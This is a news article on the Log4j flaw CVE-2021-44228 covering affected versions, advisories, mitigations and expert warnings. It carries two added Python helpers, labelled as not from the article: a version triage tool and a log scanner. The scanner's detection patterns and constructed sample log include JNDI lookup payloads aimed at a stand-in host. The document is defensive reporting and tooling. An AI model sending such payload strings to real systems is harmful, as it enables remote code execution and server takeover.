Severe Apache Log4j Vulnerability Threatens Enterprise Apps
Unauthenticated RCE Vulnerability Could Affect 'Thousands of Organizations'
Stay tuned for updates on this developing story.
A zero-day vulnerability detected in the Java logging library Apache Log4j can result in full server takeover and leaves countless applications vulnerable, according to security researchers, who say that the easily exploitable flaw was first detected in the popular game Minecraft.
The unauthenticated remote code execution vulnerability - classified as severe and tracked as CVE-2021-44228 - is actively being exploited in the wild and proof-of-concept code has been published, according to an advisory from CERT New Zealand.
Systems and services using the Java logging library Apache Log4j between version 2.0 and 2.14.1, which "includes many applications and services written in Java," are vulnerable, CERT NZ says.
The same researchers say the log files for any services using affected Log4j versions will contain user-controlled strings, including "Jndi:ldap." For immediate mitigation, researchers say, users should switch log4j2.formatMsgNoLookups to "true" by adding "-Dlog4j2.formatMsgNoLookups=True" to the JVM command for starting the application.
For prevention, they urgently advise users to upgrade Log4j versions to Log4j-2.15.0-rc2.
In an alert issued on Friday, the U.S. Cybersecurity and Infrastructure Security Agency said it "encourages users and administrators to review the Apache Log4j 2.15.0 announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately."
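As an added example (not from the article, CERT NZ or the Apache project), a small Python triage helper that applies the version range and the JVM flag described above to one deployment. It assumes one fact the article does not state, that the formatMsgNoLookups property only exists from Log4j 2.10.0 onward; the version strings and JVM arguments in it are constructed.

```python
import re
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int, int]  # (major, minor, patch, rc); rc == FINAL for a GA release
FINAL = 10**6

# Affected range quoted from CERT NZ above (2.0 through 2.14.1) and the fix the
# researchers name (2.15.0-rc2): anything from 2.0 up to, but below, the fix is exposed.
AFFECTED_MIN: Version = (2, 0, 0, 0)
FIXED: Version = (2, 15, 0, 2)
# Fact not stated in the article: log4j2.formatMsgNoLookups was introduced in Log4j 2.10.0,
# so on 2.0 through 2.9.x setting it changes nothing and only upgrading helps.
PROPERTY_MIN: Version = (2, 10, 0, 0)

def parse_version(text: str) -> Optional[Version]:
    """Parse '2.14.1' or 'log4j-core-2.15.0-rc2.jar' into a comparable tuple."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-rc(\d+))?", text)
    if not m:
        return None
    rc = int(m.group(4)) if m.group(4) else FINAL
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0), rc)

def flag_set(jvm_args: str) -> bool:
    """True if the JVM command line sets -Dlog4j2.formatMsgNoLookups=true (value is case-insensitive)."""
    m = re.search(r"-Dlog4j2\.formatMsgNoLookups=(\S+)", jvm_args)
    return m is not None and m.group(1).lower() == "true"

def assess(version_text: str, jvm_args: str = "") -> Dict[str, object]:
    """Triage one deployment: is it exposed, does the flag help, and what to do next."""
    v = parse_version(version_text)
    if v is None:
        return {"version": None, "exposed": None, "action": "could not parse version; inspect manually"}
    exposed = AFFECTED_MIN <= v < FIXED
    if not exposed:
        action = "not in the affected range" if v < AFFECTED_MIN else "fixed release; no action for CVE-2021-44228"
    elif flag_set(jvm_args) and v >= PROPERTY_MIN:
        action = "mitigated by formatMsgNoLookups; still upgrade to 2.15.0"
    elif flag_set(jvm_args):
        action = "flag has no effect before 2.10.0; upgrade to 2.15.0 now"
    else:
        action = "exposed; set -Dlog4j2.formatMsgNoLookups=true (2.10+) and upgrade to 2.15.0"
    return {"version": v, "exposed": exposed, "action": action}

if __name__ == "__main__":
    # Constructed inputs, not taken from any real deployment.
    for ver, args in [("log4j-core-2.14.1.jar", "java -Dlog4j2.formatMsgNoLookups=True -jar app.jar"),
                      ("2.8.2", "java -Dlog4j2.formatMsgNoLookups=true -jar app.jar")]:
        print(ver, "->", assess(ver, args)["action"])
```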
Minecraft & Many More
The vulnerability was first detected in the game Minecraft, but cloud applications, including those widely used across the enterprise, also remain vulnerable. This includes software, web apps and products from Apple, Amazon, Cloudflare, Twitter and Steam.
"This is a worst-case scenario," says Casey Ellis, founder and CTO of the security firm Bugcrowd. "It's going to be a long weekend for a lot of people."
"This has the potential to be really bad - like Shellshock bad. Like, remote code execution in all WordPress servers bad," says Adrian Sanabria, co-founder and director of research at Savage Security. "It might take the bad guys a few days to figure out how best to leverage this, but I highly doubt everyone is going to get this fixed before it starts getting exploited."
The vulnerability was first reported to Apache by Alibaba Cloud's security team on Nov. 24, according to Cyber Kendra.
Experts at the security firm Randori say the vulnerability is likely to affect "thousands of organizations" and "poses a significant real-world risk to affected systems," including attention from cybercriminals and nation-state actors.
Rob Joyce, a former White House homeland security adviser and current director of cybersecurity at the National Security Agency, took to Twitter regarding Log4j, saying: "[This] vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA’s GHIDRA [an open-source reverse-engineering tool]. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure."
LunaSec CEO Free Wortley and developer Chris Thompson say in a blog post that similar vulnerabilities have been exploited before - in cases such as the 2017 Equifax data breach, which exposed sensitive information of some 143 million U.S. consumers.
Adopt an 'Assume Breach' Mentality
The Randori experts say that they developed a working exploit and were able to successfully leverage the vulnerability in customer environments. "Effectively, any scenario that allows a remote connection to supply arbitrary data that is written to log files by an application utilizing the Log4j library is susceptible to exploitation," the Randori Attack Team says.
The team says it expects an increasing number of vulnerable products to be discovered in the upcoming weeks. "Due to the ease of exploitation and the breadth of applicability," it says, "we expect ransomware actors to begin leveraging this vulnerability immediately." The team advises all organizations to adopt an "assume breach" mentality and check logs for any affected applications for unusual activity.
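To act on the "check logs" advice here, and on the "Jndi:ldap" marker mentioned earlier, an added example that is not part of the article: a Python scanner over constructed access-log lines that flags the lookup string in raw or URL-encoded form, plus any lookup nested inside another lookup. The addresses and host names are placeholders.

```python
import re
from typing import Dict, Iterable, List
from urllib.parse import unquote

# The lookup string itself; matched case-insensitively because, as the article notes,
# it shows up in logs in mixed case such as "Jndi:ldap".
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\b", re.IGNORECASE)
# A lookup nested inside another lookup never belongs in request data, so it is
# flagged on its own even when the word "jndi" is not literally visible.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")

def classify_line(line: str) -> List[str]:
    """Return the detection tags that fire on one log line, checked raw and URL-decoded."""
    tags: List[str] = []
    for text in (line, unquote(line)):
        if JNDI_LOOKUP.search(text) and "jndi-lookup" not in tags:
            tags.append("jndi-lookup")
        if NESTED_LOOKUP.search(text) and "nested-lookup" not in tags:
            tags.append("nested-lookup")
    return tags

def scan(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Scan log lines and return one finding per line on which a rule fired."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, 1):
        tags = classify_line(line)
        if tags:
            findings.append({"line": lineno, "tags": tags, "text": line.strip()})
    return findings

# Constructed access-log sample (TEST-NET addresses, .example hosts): line 1 is benign,
# lines 2 and 3 carry the lookup in a User-Agent and a query string, line 4 is a nested lookup.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://c2.example/a}"
203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=${JNDI:LDAP://c2.example/b} HTTP/1.1" 400 0 "-" "curl/7.79"
203.0.113.9 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" "${upper:${lower:abc}}"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"line {f['line']}: {', '.join(f['tags'])}: {f['text']}")
```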
'Bundled in With Software You Use'
Other experts also stress the significance of this severe vulnerability.
Security researcher Marcus Hutchins of the firm Kryptos Logic tweeted: "In the case of Minecraft, attackers were able to get remote code execution on Minecraft Servers by simply pasting a short message into the chat box."
And John Hammond, senior security researcher at the firm Huntress, says in a blog: "The log4j package may be bundled in with software you use provided by any given vendor. In this scenario, unfortunately, the vendors themselves will need to push the security updates downstream."
"There’s no obvious target for this vulnerability," he says. "Hackers are taking a spray-and-pray approach to wreak havoc. … Depending on access controls and other elements of your security posture, this could lead to future compromise - whether it be cryptocurrency miners, Cobalt Strike beacons, or ransomware."
This dire warning also serves as an example of how critical detection and response capabilities are and exposes the riskiness of "prevent, patch and pray" strategies embedded in legacy security programs, says Tim Wade, a former network and security technical manager with the U.S. Air Force who is currently technical director with the firm Vectra AI.
And Hammond says, "As you assess your own risk and threat model, please consider the components of the software you use and especially what may be publicly accessible."
+++
Update [5:10 p.m., Dec. 10]: A spokesperson for Cloudflare tells ISMG: "We have no evidence of exploitation of us. We responded quickly to evaluate all potential areas of risk and updated our software to prevent attacks, and have not been able to replicate any external claims that we might be at risk."
Update [5:15 p.m., Dec. 10]: The story has been updated to include CISA's Log4j advisory.